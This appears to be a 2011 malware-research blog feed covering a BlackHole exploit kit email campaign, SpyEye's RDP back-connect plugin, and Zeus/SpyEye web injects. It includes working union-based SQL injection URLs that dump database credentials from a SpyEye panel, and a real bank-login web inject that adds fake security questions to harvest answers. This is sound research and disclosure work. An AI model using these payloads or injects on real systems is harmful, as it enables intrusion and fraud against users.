BlackHole BEP + HP Scanner Infections

We have recently encountered a heavy set of email traffic spreading HP scanning email with non legitimate links. No doubt, this campaign is a traffic infection process by sending plethora of emails around the internet. It is not a big deal of getting email addresses nowadays. It is just a walk-around in the park for the phishers or attackers. This HP scanning email looks like as presented below

The only part that interests in giving a brief shot at this malware campaign is the usage of Java Exploits through BlackHole BEP.
The user is forced or tricked to visit a domain with URL hxxp://finance-motor.info/main.php which is further redirected to malicious domain hxxp://ahredret.ru/main.php. Now the URL, which is from russian domain with following information
domain: AHREDRET.RU
nserver: dns1.naunet.ru.
nserver: dns2.naunet.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
e-mail: mxx3@yandex.ru
registrar: NAUNET-REG-RIPN
created: 2011.10.06
paid-till: 2012.10.06
source: TCI

Last updated on 2011.10.17 20:35:46 MSK/MSD

The above presented information shows that this domain is activated and is recently accessed. The active time stamp shows that this is an active infection process. Without a doubt, the domain has port 80 and port 22 opened. The port 80 serves the BlackHole BEP and port 22 is for administration as shown below

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 1024 bb:d1:ae:ea:db:46:97:2a:09:ca:38:cc:50:47:9c:24 (DSA)

|_1024 39:1d:f5:8c:fa:ad:9c:02:a0:bf:db:9d:2a:24:73:bb (RSA)
80/tcp open http nginx


So, the next step is to try with wepawet but as expected the server did not respond well to the tool as presented below


The automated HTTP request/response and detection module did not work appropriately. At last, its all about manual analysis by setting an appropriate sandbox environment. We preferred to have a generic settings that provide malware an opportunity to expand and gives us the information that is required. So on performing manual testing carefully, we were served with exploit prototype as follows


The field.jar contains the following set of Java files



We have already performed analysis on this kind of exploit which is used effectively by the BlackHole (Java is what I like the most for spreading infections).

Fetch the code - http://www.secniche.org/sample_exploits/hp_scan_exploit.rar

Enjoy !

Virus Bulletin 2011 Conference - Death by Bundled Exploits

We have presented about our research at Virus Bulletin conference 2011.

Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exploits

View more presentations from Aditya K Sood

Threatpost coverage : http://threatpost.com/en_us/blogs/researcher-malware-increasingly-interdependent-stifles-security-wares-100711

Enjoy!

OWASP AppSec USA 2011 - Dismantling Web Malware

OWASP AppSec USA 2011 - Hunting Web Malware

View more presentations from Aditya K Sood

Virus Bulletin - Browser Malware Taxonomy

Browser Malware Taxonomy

View more documents from Aditya K Sood

Journal : http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-browser-malware-taxonomy

We will be releasing more papers from Virus Bulletin, once we complete the three month time period from the date of publication. Its all about serving the contract.

BruCon 2011 - Botnets and Browsers

BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in the Ghost Shell)

View more presentations from Aditya K Sood

Blasting SpyEye C&C - SQL Injection Wins

The world has changed dramatically with the evolution of malware. A similar set of vulnerabilities ( web attacks specific) such as SQL injection can be used to compromise the malware driven server. Some time ago, we talked about Blind SQL Injection in SpyEye Version 1.0 in which we presented about the vulnerability in the SpyEye code. Since then we dint get the time to present it as a complete case study. In this post, we are going to talk about the step by step approach to compromise the SpyEye database server. One can do lot of different attacks such as Local File Inclusion (LFI) there by reading the configuration credentials. However, we are sticking to the SQL injection to show how well we can inject and take control of malware server.

The vulnerability affects the latest version of spyeye (1.3) within "frmcp0/frm_findrep_sub2.php?id=". The good point is this SQL injection works right on the fly without any authentication.

Injection 1: Version Disclosure - http://spyeye_domain.com/frmcp /frm_findrep_sub2.php?id=-999999%20union%20all%20select%200x31,concat(0x7e,0x27,version()
,0x27,0x7e),0x33,0x34,0x35,0x36,0x37--+



You can see the injection is occurring in the title field. This suggests that our payload is getting injected. On similar testing pattern, let's perform some other set of injections as presented below

Injection 2: Database Verification - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999%20union%20all%20select%200x31,concat(0x7e,
0x27,database(),0x27,0x7e),0x33,0x34,0x35,0x36,0x37--+



Injection 3: Information Schema Disclosure -
http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999 union all select 0x31,concat(0x7e,0x27,group_concat(column_name),0x27,0x7e),0x33,0x34,0x35,0x36,0x37 from `information_schema`.columns where table_schema=0x6d7973716c and table_name=0x75736572--+

The disclosed schema is as follows

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,
Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,
Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,
Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,
Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,
Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,
x509_subject,max_questions,max_updates,max_connections,max_user_connections

Injection 4: Pwning MySQL Database - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999 union all select 0x31,concat(0x7e,0x27,user.User,0x3a,user.Host,0x3a,user.Password,0x27,0x7e)
,0x33,0x34,0x35,0x36,0x37 from `mysql`.user limit 0,1--+



So this discussion has proved the fact that security vulnerabilities can be fruitful in hunting back malware. We will be giving a detailed talk on Hunting Web Malware at OWASP and Hacker Halted this year.

OWASP AppSec USA - http://www.appsecusa.org/talks.html#goodhacker

Hacker Halted : http://www.hackerhalted.com/2011/Presenters.aspx

Stay tuned.

SpyEye - RDP BackConnect Plugin and Total Commander

Well, malware has many facets and there is no doubt in that. In this post, we are going to raise a point about the SpyEye RDP back-connect plugin and its working. During out talk at Hack In The Box (HITB) - AMS, we presented about the details of SpyEye botnet and its ability to work with modular plugins. The RDP plugin in SpyEye works on the same benchmarks as FTP and SOCKS.

Generally, the bot is compiled up with different plugins. The RDP plugin starts a dynamic server on the client machine where the bot is installed. From the victim machine, the bot connects back to main server over RDP. The plugin is well equipped enough to create a hidden user in the victim machine and this account is used to for back server connections. However, this plugin is good enough to allow the remote command server to execute commands on victim machine using RDP.

In addition, the SpyEye bot downloads the portable version of Total Commander from the internet and execute it in the memory on the fly. The beauty of this plugin is that it does not require any system restart when Total Commander is downloaded and installed into the victim machine.



The plugin requires following environmental variables in order to specify the required information for plugin execution

%IP_OF_BC_SERVER%
%PORT_OF_BC_SERVER%
%MAGIC_CODE%
%WINDOWS_LOGIN%
%WINDOWS_PASSWORD%
%URL_TO_PORTABLE_TCMD%

The connection to the bot can be performed using standard Windows tool mstsc.exe Remote Desktop Connection:. It has also been observed that this plugin support only x86 OS and not x64 architectures. In the coming time, hopefully this will be released too.

Virus Bulletin - SpyEye Exploitation Tactics

As a follow-up to our article on the SpyEye malware infection framework, we are discussing the SpyEye bot and the tactics it uses for stealing information from victim machines.

Fetch the paper from here : http://www.virusbtn.com/virusbulletin/archive/2011/08/vb201108-spyeye

Right now available for subscribers only.

(SpyEye & Zeus) Web Injects - Parameters

We are in the process of analyzing the enormous set of web injects log and real client side code. During analysis, we found that third generation botnets (Zeus and SpyEye) use an explicit technique of injecting rogue content in the web pages of bank websites. The content is injected as inline but the plugins that are used to complete this process follows a certain set of parameters and procedure. In this post, we are going to talk about the metrics that are used to perform web injects successfully. The plugin communicates with installed bot on client side and a specific steps are followed as a part of hierarchical infection in order to trick the browser.

The installed bot understands the following parameters

1. set_url [Target to inject]
The set_url parameter instantiates an object which points to the website which is aimed for web injects. The bot uses this parameter to scan through the HTTP requests for possible match of the website so that injection can be done.

2. data_before / data_end
These parameters are used to set the injection code in an appropriate manner so that HTML code looks fine and does not show broken tags. Generally, these parameters define the base of web inject because the injected data comprises of the HTML tags to be injected before the main injection. Further, "data_before / data_end" also points before which HTML tag the data is required to be injected.

3. data_inject | data_end
These parameters are the main killing part in which the real web injects are placed. The rogue or non legitimate JavaScript/HTML code is set in these parameters which is injected in the legitimate bank website or any proprietary financial web site.

4. data_after | data_end
These are last set of parameters which are used to complete the web injects by placing requisite HTML tags at the end of web injects code. Again the purpose is to render the HTML code successfully and inline with the main webpage of website.

These collective set of parameters can also be used to inject multiple code in the target website.

One of the real time injected code is presented below
set_url https://target_website/login.html* GP
data_before
name="password"*[/tr]
data_end
data_inject
[TD][FONT class=userinfo] What is your favourite meal or restaurant? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q1] [/TD][/TR]
[TD][FONT class=userinfo] The name of a memorable place to you? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q2] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite film of all time? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q3] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite book of all time? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q4] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite teacher or subject? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q5] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite TV star or show? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q6] [/TD][/TR]
data_end
data_after
data_end

data_before
var cusID*;
data_end
data_inject

if (document.forms[0].q1.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q1.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q2.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q2.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q3.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q3.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q4.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q4.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q5.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q5.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q6.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q6.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
data_end
data_after
data_end

These examples clarify the fact that how exactly the web injects code works and is rendered in the webpages by the installed bot.

SpyEye Malware Infection Framework - VB

We have just release the first part of our research on SpyEye in Virus Bulletin Magazine. The next part of the research will be coming soon.

VB - SpyEye Malware Infection Framework